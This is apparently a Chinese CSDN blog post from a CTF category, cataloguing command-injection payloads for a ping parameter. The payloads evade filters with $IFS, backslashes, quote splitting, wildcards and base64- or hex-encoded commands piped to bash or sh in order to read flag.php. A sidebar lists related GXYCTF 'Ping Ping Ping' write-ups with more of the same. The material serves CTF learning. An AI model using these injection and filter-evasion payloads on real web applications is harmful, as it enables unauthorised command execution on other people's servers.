命令执行绕过

VIP文章 已于 2024-04-24 23:03:05 修改
阅读量259 收藏 2
点赞数
分类专栏: ctf 文章标签: linux 运维 服务器 网络安全 密码学
于 2023-03-26 13:58:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57439582/article/details/129630028
版权

命令执行绕过

内联执行

1.?ip=127.0.0.1;cat$IFS`ls`
2.?ip=127.0.0.1;cat$IFS$3`ls`
3.?ip=127.0.0.1;cat$IFS$9`ls`
4.?ip=127.0.0.1|cat$IFS$9`ls`

被过滤的bash,用管道+sh替换

Y2F0IGZsYWcucGhw
?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|bash
 

过滤了flag、bash,但sh没过滤,linux下可用sh

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
|sh 就是执行前面的echo脚本

cat fl*  用*匹配任意 
cat fla* 用*匹配任意
ca\t fla\g.php        反斜线绕过
cat fl''ag.php        两个单引号绕过
echo "Y2F0IGZsYWcucGhw" | base64 -d | bash      
//base64编码绕过(引号可以去掉)  |(管道符) 会把前一个命令的输出作为后一个命令的参数

echo "63617420666c61672e706870" | xxd -r -p | bash       
//hex编码绕过(引号可以去掉)

echo "63617420666c61672e706870" | xxd -r -p | sh     
//sh的效果和bash一样

</

最低0.47元/天 解锁文章
守住了残局却守不住你
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
17.命令执行相关函数及各类命令执行绕过技巧讲解.pdf
01-25
命令执行相关函数及各类命令执行绕过技巧讲解
绕过WAF运行命令执行漏洞的方法大全1
08-03
前言一、windows下前天安全客当然你可以加无数个”但不能同时连续加2个^符号,因为^号是cmd中的转义符,跟在他后面的符号会被转义如果在命令执行的时候遇到了
Linux下的命令执行绕过技巧合集(渗透测试专用)
Thunderclap的博客
02-23 3283
Linux下的命令执行绕过技巧合集(渗透测试专用)
Ping Ping Ping—命令执行
m0_53065491的博客
02-23 6279
打开创建好的环境发现提示/?ip=,第一反应应该是考命令执行 构造payload /?ip=127.0.0.1;ls 出现了flag.php,尝试读取它的内容。/?ip=127.0.0.1;cat flag.php 可以发现过滤了空格,接下来就是要绕过过滤,Liunx下常见的绕过空格方式有以下几种 cat$IFS$1flag.php//$1-$9都可以 cat${IFS}flag.php {cat,flag.php} cat<flag.php cat<>flag.php /?ip.
[GXYCTF 2019]Ping Ping Ping
m0_62422842的博客
05-08 7771
前言 最近在学习ssrf漏洞,这个漏洞的综合性还是挺强的。在网上看了大佬的文章总结的很详细。在此基础就通过实践相结合,更加深入的理解ssrf的具体操作。 SSRF漏洞 有一些函数比如
【BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
algae
08-29 8947
【BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
BUUCTF之Ping Ping Ping
金 帛的博客
02-20 6371
BUUCTFWP,关于一些waf的绕过
【网络安全---Linux命令绕过】Linux下命令执行绕过技巧(很全,很实用)
最新发布
m0_67844671的博客
09-24 1634
Linux下命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格的绕过,关键字绕过,编码绕过等等;
WMIHACKER:绕过防病毒软件横向移动命令执行工具
03-18
简介:常见的WMIEXEC,PSEXEC工具执行命令是创建服务或调用Win32_Process.create,这些方法已被防病毒软件100%拦截,因此我们创建了WMIHACKER(绕过防病毒软件横向移动命令执行测试工具) (不需要445端口)。...
struts2绕过waf读写文件及另类方式执行命令1
08-03
但是执命令会发现直接 Connection Reset ,很明显是被 waf 拦截了0x01 背景0x02 探究 waf 规则个个删除关键字,发现拦截的关键字有
struts2绕过waf读写文件及另类方式执行命令.doc
07-08
struts2绕过waf读写文件及另类方式执行命令.doc
BUUCTF刷题记录 Ping Ping Ping
m0_46576074的博客
05-16 1793
[GXYCTF2019]Ping Ping Ping 进入页面 然后/?ip=127.0.0.1|ls 进入 读取flag.php 再cat$IFS$1indnx.php 再变量拼接 ?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 转至 http://1d22a0a5-c6a0-43f1-8e52-e5a33ec7e044.node3.buuoj.cn/?ip=127.0.0.1;a=g;cat$IFS1fla1fla1flaa.php 再F12 ...
Buuctf (Web)Ping Ping Ping
m0_64444909的博客
04-02 2640
文章目录一.解题步骤二、命令分隔符三.常见绕过方式 一.解题步骤 (1)页面里显示/?ip=,很明显要以ping的形式传一个参数给ip,并且我们要想执行其他命令,就要用命令分隔符也就是管道符连接,命令分隔符可以用";“”|“”&"三种,本题经过尝试发现第一步查看目录过滤了|,&和空格。 这里介绍两种方式: 1.ping本地127.0.0.1 2.用||来代替127.0.0.1; (2)虽然找到了放flag的文件,但是尝试后发现都不对,这里介绍一种思路,我们可以通过查看index.php
buuctf [GXYCTF2019]Ping Ping Ping 1
weixin_45642610的博客
01-11 1446
buuctf [GXYCTF2019]Ping Ping Ping 1-刷题个人日记 小白一个,写给自己看。 进去后是这样: ctrl+u看网页源码也没什么,随便输个数据看看: 源码一样没什么。看题目提示,试试你能想到的方法,比如sql注入:输入ip=1' 不是sql注入,试完了发现是命令执行,输入 /?ip=1;ls 两个都看看,先看index.php输入: /?ip=1;cat index.php 看来过滤了空格 再输入 /?ip=1;cat$IFS$1index.php IFS在系统命令
[BUU] [GXYCTF2019]Ping Ping Ping 1 Write-Up
qq_61758260的博客
05-08 174
1.基本读题 通过标题得知应该是一个命令注入的题目,进入环境后提醒我们通过get方式提交ip 2.进一步信息收集 先尝试一些基本的命令注入: 127.0.0.1;ls 和 127.0.0.1;dir 以判断是linux系统还是windows系统 注入127.0.0.1;dir时是没有回显的,相反,注入127.0.0.1;ls时返回了目录 这里发现有flag.php和index.php两个文件,自然先尝试能不能直接打开flag.php 先尝试: 127.0.0.1;cat flag.php 失败,并且返回了
Linux命令执行绕过
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
02-03 4083
主要介绍了linux的命令执行绕过、文件读取的一些方法
[GXYCTF2019]Ping Ping Ping(RCE)
xlcvv的博客
04-06 7419
这题考的比较全面: 随便ping一下: 正常request了,那跟我之前做的有一题应该差不多,直接payload: ?ip=127.0.0.1;cat%20/flag 应该是过滤了一些符号,那先试试payload: ?ip=127.0.0.1;ls 还好ls了一下,不然这不得cat半天? 试一下cat index: 过滤空格了,可以用${IFS}$代替: 可能也过滤了{},用$IF...
BUUCTF Web [GXYCTF2019]Ping Ping Ping
热门推荐
wangyuxiang946的博客
10-28 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [GXYCTF2019]Ping Ping Ping一、题目简介二、思路分析1)多命令执行2)绕过空格3)绕过flag三、解题步骤1)查看当前目录2)查看文件内容3)flag 在注释中四、总结 一、题目简介 进入连接后是一个「ping」的功能,参数 ip 传递的内容会被当做 ip.
BUUCTF【Web】Ping Ping Ping
qq_70434663的博客
03-02 721
首先使用ls命令查看当前路径下有那些文件,拼接符有“&”、“|”、“||”、“&&”、“;进入靶场后是一个ping的功能(命令执行漏洞),参数ip传递的内容会被当做ip地址进行网络连通性测试。绕过空格后发现过滤了flag(绕过flag),所以使用反引号``(高优先级特性)查看flag.php。绕过后我们并没有发现flag,那是因为注释的内容不会直接显示在页面中,右键查看源码就可以获取flag。接下来直接访问flag.php文件,直接访问PHP发现空格过滤了(绕过空格),所以我们使用$IFS$9来绕过空格。
web命令执行常见绕过方式
07-10
常见的web命令执行绕过方式包括: 1. 输入过滤绕过:通过使用各种编码、特殊字符或绕过函数来绕过输入过滤机制,如使用URL编码、HTML编码、Unicode编码等。 2. 命令分隔符绕过:通过插入特殊字符或空格来绕过命令...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值